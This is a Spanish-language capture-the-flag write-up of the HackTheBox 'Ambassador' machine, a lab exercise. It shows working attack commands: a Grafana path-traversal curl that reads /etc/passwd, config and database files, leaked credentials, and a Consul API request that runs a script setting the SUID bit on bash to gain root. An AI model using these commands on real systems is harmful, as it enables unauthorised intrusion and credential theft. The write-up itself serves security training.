HackTheBox machines – Ambassador WriteUp

Ambassador es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Media.

En este caso se trata de una máquina basada en el Sistema Operativo Linux.

Índice

Escaneo de puertos

Como de costumbre, agregamos la IP de la máquina Ambassador 10.10.11.183 a /etc/hosts como ambassador.htb y comenzamos con el escaneo de puertos nmap.

# Nmap 7.92 scan initiated Sat Nov  5 09:19:21 2022 as: nmap -sV -oA enumeration/nmap 10.10.11.183
Nmap scan report for 10.10.11.183
Host is up (0.048s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
3000/tcp open  ppp?
3306/tcp open  mysql   MySQL 8.0.30-0ubuntu0.20.04.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=11/5%Time=63662AA2%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Sat,\x2005\x20Nov\x202022\x2009:19
SF::32\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Sa
SF:t,\x2005\x20Nov\x202022\x2009:19:37\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
SF:\x20mode=block\r\nDate:\x20Sat,\x2005\x20Nov\x202022\x2009:20:03\x20GMT
SF:\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov  5 09:20:54 2022 -- 1 IP address (1 host up) scanned in 92.51 seconds

# Nmap 7.92 scan initiated Sat Nov 5 09:19:21 2022 as: nmap -sV -oA enumeration/nmap 10.10.11.183

Nmap scan report for 10.10.11.183

Host is up (0.048s latency).

Not shown: 996 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

3000/tcp open ppp?

3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port3000-TCP:V=7.92%I=7%D=11/5%Time=63662AA2%P=x86_64-pc-linux-gnu%r(Ge

SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t

SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x

SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro

SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir

SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\

SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten

SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect

SF:ion:\x201;\x20mode=block\r\nDate:\x20Sat,\x2005\x20Nov\x202022\x2009:19

SF::32\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<

SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty

SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\

SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac

SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra

SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO

SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O

SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Sa

SF:t,\x2005\x20Nov\x202022\x2009:19:37\x20GMT\r\nContent-Length:\x200\r\n\

SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T

SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400

SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req

SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2

SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1

SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset

SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess

SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/

SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re

SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty

SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\

SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\

SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset

SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\

SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt

SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt

SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;

SF:\x20mode=block\r\nDate:\x20Sat,\x2005\x20Nov\x202022\x2009:20:03\x20GMT

SF:\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n"

SF:);

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Nov 5 09:20:54 2022 -- 1 IP address (1 host up) scanned in 92.51 seconds

Realizada una primera enumeración de puertos vamos a proceder a evaluar cada uno de ellos.

Enumeración

Procedemos a revisar el portal web en el puerto 80 y nos encontramos con la siguiente aplicación web

No vemos gran cosa por aqui a excepción de una página en la que indica que se debe acceder por ssh con el usuario developer y que DevOps nos dará esa información.

No vemos mucho más en esta web así que continuamos con el puerto 3000, en el cual nos encontramos un panel de login de grafana

Obtenemos la versión del mismo buscamos en google y encontramos una vulnerabilidad CVE-2021-43798 y un exploit para ella en

https://www.exploit-db.com/exploits/50581

1	https://www.exploit-db.com/exploits/50581

Descargamos el mismo y lo ejecutamos para explotar la vulnerabilidad de LFI y obtener el fichero /etc/passwd

python3 cve-2021-43798.py -H http://ambassador.htb:3000
Read file > /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
grafana:x:113:118::/usr/share/grafana:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
consul:x:997:997::/home/consul:/bin/false

python3 cve-2021-43798.py -H http://ambassador.htb:3000

Read file > /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin

systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin

systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin

messagebus:x:103:106::/nonexistent:/usr/sbin/nologin

syslog:x:104:110::/home/syslog:/usr/sbin/nologin

_apt:x:105:65534::/nonexistent:/usr/sbin/nologin

tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false

uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin

tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin

landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin

pollinate:x:110:1::/var/cache/pollinate:/bin/false

usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

sshd:x:112:65534::/run/sshd:/usr/sbin/nologin

systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

developer:x:1000:1000:developer:/home/developer:/bin/bash

lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false

grafana:x:113:118::/usr/share/grafana:/bin/false

mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false

consul:x:997:997::/home/consul:/bin/false

Así que conociendo la vulnerabilidad vamos a descargarnos el fichero de configuración de grafana

$ python3 cve-2021-43798.py -H http://ambassador.htb:3000
Read file > /etc/grafana/grafana.ini

1 2	$ python3 cve-2021-43798.py -H http://ambassador.htb:3000 Read file > /etc/grafana/grafana.ini

Revisamos el mismo y obtenemos las credenciales de autenticación del usuario admin

$ cat grafana.ini |grep -i admin_
;disable_initial_admin_creation = false
;admin_user = admin
admin_password = messageInABottle685427
;admin_config_poll_interval = 60s
;plugin_admin_enabled = false
;plugin_admin_external_manage_enabled = false

$ cat grafana.ini |grep -i admin_

;disable_initial_admin_creation = false

;admin_user = admin

admin_password = messageInABottle685427

;admin_config_poll_interval = 60s

;plugin_admin_enabled = false

;plugin_admin_external_manage_enabled = false

Llegados a este punto no podemos sacar mucho más, así que vamos a descargarnos el fichero de base de datos de grafana, en este caso el exploit no nos vale así que lo haremos con curl

curl -s --path-as-is  http://ambassador.htb:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

1	curl -s --path-as-is http://ambassador.htb:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

Revisamos el mismo y encontramos el usuario, la password y el esquema de base de datos

$ strings grafana.db |grep -i grafana
mysqlmysql.yamlproxydontStandSoCloseToMe63221!grafanagrafana{}2022-09-01 22:43:032022-11-05 09:17:42{}uKewFgM4z
mysqlMySQLproxydontStandSoCloseToMegrafanagrafana{}2022-09-01 22:36:392022-09-01 22:36:39{}R7v2FgGVk

$ strings grafana.db |grep -i grafana

mysqlmysql.yamlproxydontStandSoCloseToMe63221!grafanagrafana{}2022-09-01 22:43:032022-11-05 09:17:42{}uKewFgM4z

mysqlMySQLproxydontStandSoCloseToMegrafanagrafana{}2022-09-01 22:36:392022-09-01 22:36:39{}R7v2FgGVk

Que serían

db: grafana
user: grafana
password: dontStandSoCloseToMe63221!

db: grafana

user: grafana

password: dontStandSoCloseToMe63221!

Así que vamos a conectarnos por mysql al puerto 3306 que vimos anteriormente en el escaneo con nmap

$ mysql -h ambassador.htb -u grafana -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 15
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;<br>+--------------------+<br>| Database |<br>+--------------------+<br>| grafana |<br>| information_schema |<br>| mysql |<br>| performance_schema |<br>| sys |<br>| whackywidget |<br>+--------------------+<br>6 rows in set (0.053 sec)<br>

MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users                  |
+------------------------+
1 row in set (0.047 sec)

MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.046 sec)

$ mysql -h ambassador.htb -u grafana -p

Enter password:

Welcome to the MariaDB monitor. Commands end with ; or \g.

Your MySQL connection id is 15

Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [whackywidget]> show tables;

+------------------------+

| Tables_in_whackywidget |

+------------------------+

| users |

+------------------------+

1 row in set (0.047 sec)

MySQL [whackywidget]> select * from users;

+-----------+------------------------------------------+

| user | pass |

+-----------+------------------------------------------+

| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |

+-----------+------------------------------------------+

1 row in set (0.046 sec)

Y obtenemos las claves del usuario developer, las cuales están en base64 así que decodificamos

$ echo "YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg=="|base64 -d
anEnglishManInNewYork027468

1 2	$ echo "YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg=="\|base64 -d anEnglishManInNewYork027468

Y ya tenemos las claves del usuario developer para acceder por ssh.

Obteniendo la flag de user

Con las claves del usuario nos queda acceder por ssh y obtener la primera flag

$ ssh developer@ambassador.htb
The authenticity of host 'ambassador.htb (10.10.11.183)' can't be established.
ED25519 key fingerprint is SHA256:zXkkXkOCX9Wg6pcH1yaG4zCZd5J25Co9TrlNWyChdZk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'ambassador.htb' (ED25519) to the list of known hosts.
developer@ambassador.htb's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 05 Nov 2022 09:54:13 AM UTC

  System load:           0.04
  Usage of /:            81.2% of 5.07GB
  Memory usage:          41%
  Swap usage:            0%
  Processes:             227
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.183
  IPv6 address for eth0: dead:beef::250:56ff:feb9:f339

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Sep  2 02:33:30 2022 from 10.10.0.1
developer@ambassador:~$ id
uid=1000(developer) gid=1000(developer) groups=1000(developer)
developer@ambassador:~$ ls -l
total 8
drwx------ 3 developer developer 4096 Mar 14  2022 snap
-rw-r----- 1 root      developer   33 Nov  5 09:17 user.txt
developer@ambassador:~$ cat user.txt 
2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3
developer@ambassador:~$

$ ssh developer@ambassador.htb

The authenticity of host 'ambassador.htb (10.10.11.183)' can't be established.

ED25519 key fingerprint is SHA256:zXkkXkOCX9Wg6pcH1yaG4zCZd5J25Co9TrlNWyChdZk.

This key is not known by any other names

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'ambassador.htb' (ED25519) to the list of known hosts.

developer@ambassador.htb's password:

Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Sat 05 Nov 2022 09:54:13 AM UTC

System load: 0.04

Usage of /: 81.2% of 5.07GB

Memory usage: 41%

Swap usage: 0%

Processes: 227

Users logged in: 0

IPv4 address for eth0: 10.10.11.183

IPv6 address for eth0: dead:beef::250:56ff:feb9:f339

* Super-optimized for small spaces - read how we shrank the memory

footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Last login: Fri Sep 2 02:33:30 2022 from 10.10.0.1

developer@ambassador:~$ id

uid=1000(developer) gid=1000(developer) groups=1000(developer)

developer@ambassador:~$ ls -l

total 8

drwx------ 3 developer developer 4096 Mar 14 2022 snap

-rw-r----- 1 root developer 33 Nov 5 09:17 user.txt

developer@ambassador:~$ cat user.txt

2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3

developer@ambassador:~$

Escalado de privilegios

Para el escalado procedemos a enumerar la máquina en detalle y encontramos dos directorios interesantes en la ruta /opt

developer@ambassador:/opt$ ll
total 16
drwxr-xr-x  4 root   root   4096 Sep  1 22:13 ./
drwxr-xr-x 20 root   root   4096 Sep 15 17:24 ../
drwxr-xr-x  4 consul consul 4096 Mar 13  2022 consul/
drwxrwxr-x  5 root   root   4096 Mar 13  2022 my-app/

developer@ambassador:/opt$ ll

total 16

drwxr-xr-x 4 root root 4096 Sep 1 22:13 ./

drwxr-xr-x 20 root root 4096 Sep 15 17:24 ../

drwxr-xr-x 4 consul consul 4096 Mar 13 2022 consul/

drwxrwxr-x 5 root root 4096 Mar 13 2022 my-app/

Observamos un directorio de una aplicación llamada consul y el directorio my-app que contiene un directorio .git por lo que vamos a ver histórico de cambios del mismo

developer@ambassador:/opt/my-app$ git log
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:44:45 2022 +0000

    config script

commit 8dce6570187fd1dcfb127f51f147cd1ca8dc01c6
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 22:47:01 2022 +0000

    created project with django CLI

commit 4b8597b167b2fbf8ec35f992224e612bf28d9e51
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 22:44:11 2022 +0000

    .gitignore

developer@ambassador:/opt/my-app$ git log

commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)

Author: Developer <developer@ambassador.local>

Date: Sun Mar 13 23:47:36 2022 +0000

tidy config script

commit c982db8eff6f10f8f3a7d802f79f2705e7a21b55

Author: Developer <developer@ambassador.local>

Date: Sun Mar 13 23:44:45 2022 +0000

config script

commit 8dce6570187fd1dcfb127f51f147cd1ca8dc01c6

Author: Developer <developer@ambassador.local>

Date: Sun Mar 13 22:47:01 2022 +0000

created project with django CLI

commit 4b8597b167b2fbf8ec35f992224e612bf28d9e51

Author: Developer <developer@ambassador.local>

Date: Sun Mar 13 22:44:11 2022 +0000

.gitignore

Revisamos en detalle cada uno de ellos y encontramos un token que posiblemente podremos utilizar más adelante

developer@ambassador:/opt/my-app$ git show 33a53ef9a207976d5ceceddc41a199558843bf3c
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date:   Sun Mar 13 23:47:36 2022 +0000

    tidy config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
 # We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
 
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD

developer@ambassador:/opt/my-app$ git show 33a53ef9a207976d5ceceddc41a199558843bf3c

commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)

Author: Developer <developer@ambassador.local>

Date: Sun Mar 13 23:47:36 2022 +0000

tidy config script

diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh

index 35c08f6..fc51ec0 100755

--- a/whackywidget/put-config-in-consul.sh

+++ b/whackywidget/put-config-in-consul.sh

@@ -1,4 +1,4 @@

# We use Consul for application config in production, this script will help set the correct values for the app

-# Export MYSQL_PASSWORD before running

+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running

-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD

+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD

Procedemos a revisar el directorio consul y vemos que se trata de la app de hashicorp con dicho nombre así que vamos a googlear un poco y encontramos una vulnerabilidad de rce y un exploit en ruby para llevarla a cabo

https://www.exploit-db.com/exploits/46074

1	https://www.exploit-db.com/exploits/46074

Para no liarnos demasiado, y debido a que el script está preparado para lanzarse con metasploit, revisamos el comportamiento del mismo y observamos que se trata de una petición PUT con una serie de parámetros así que lanzaremos la petición con curl.

En primer lugar vamos a generar un script que nos permita dar permisos de suid al binario de bash

echo "chmod +s /usr/bin/bash" > /tmp/exploit.sh

1	echo "chmod +s /usr/bin/bash" > /tmp/exploit.sh

Y posteriormente ejecutaremos el curl

developer@ambassador:/opt/my-app$ curl --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" --request PUT -d '{"ID": "bytemind", "Name": "bytemind", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/exploit.sh"], "interval": "1s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register

developer@ambassador:/opt/my-app$ curl --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" --request PUT -d '{"ID": "bytemind", "Name": "bytemind", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/exploit.sh"], "interval": "1s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register

Esperamos unos segundos y si todo ha ido bien veremos que se han asignado los permisos esperados al binario de bash

developer@ambassador:/opt/my-app$ ll /usr/bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /usr/bin/bash*

1 2	developer@ambassador:/opt/my-app$ ll /usr/bin/bash -rwsr-sr-x 1 root root 1183448 Apr 18 2022 /usr/bin/bash*

Obteniendo la flag de root

Ahora sólo nos queda escalar a root y obtener la flag

developer@ambassador:/opt/my-app$ bash -p
bash-5.0# id
uid=1000(develop
bash-5.0# ls -l /root/
total 12
-rwxr-xr-x 1 root root   62 Sep 14 11:00 cleanup.sh
-rw-r----- 1 root root   33 Nov  5 09:17 root.txt
drwx------ 3 root root 4096 Mar 13  2022 snap
bash-5.0# cat /root/root.txt 
5xxxxxxxxxxxxxxxxxxxxxxxxxxxxa

developer@ambassador:/opt/my-app$ bash -p

bash-5.0# id

uid=1000(develop

bash-5.0# ls -l /root/

total 12

-rwxr-xr-x 1 root root 62 Sep 14 11:00 cleanup.sh

-rw-r----- 1 root root 33 Nov 5 09:17 root.txt

drwx------ 3 root root 4096 Mar 13 2022 snap

bash-5.0# cat /root/root.txt

5xxxxxxxxxxxxxxxxxxxxxxxxxxxxa

Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.

Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace

HackTheBox machines – Ambassador WriteUp

Ambassador es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox basada en Linux

Escaneo de puertos

Enumeración

Obteniendo la flag de user

Escalado de privilegios

Obteniendo la flag de root

Tal vez te interese...

Deja una respuesta Cancelar la respuesta

Tal vez te interese...

Búsqueda

Escaneo de puertos

Enumeración

Obteniendo la flag de user

Escalado de privilegios

Obteniendo la flag de root

Tal vez te interese...

Deja una respuesta Cancelar la respuesta

Tal vez te interese...

Búsqueda

Populares

Nube de Tags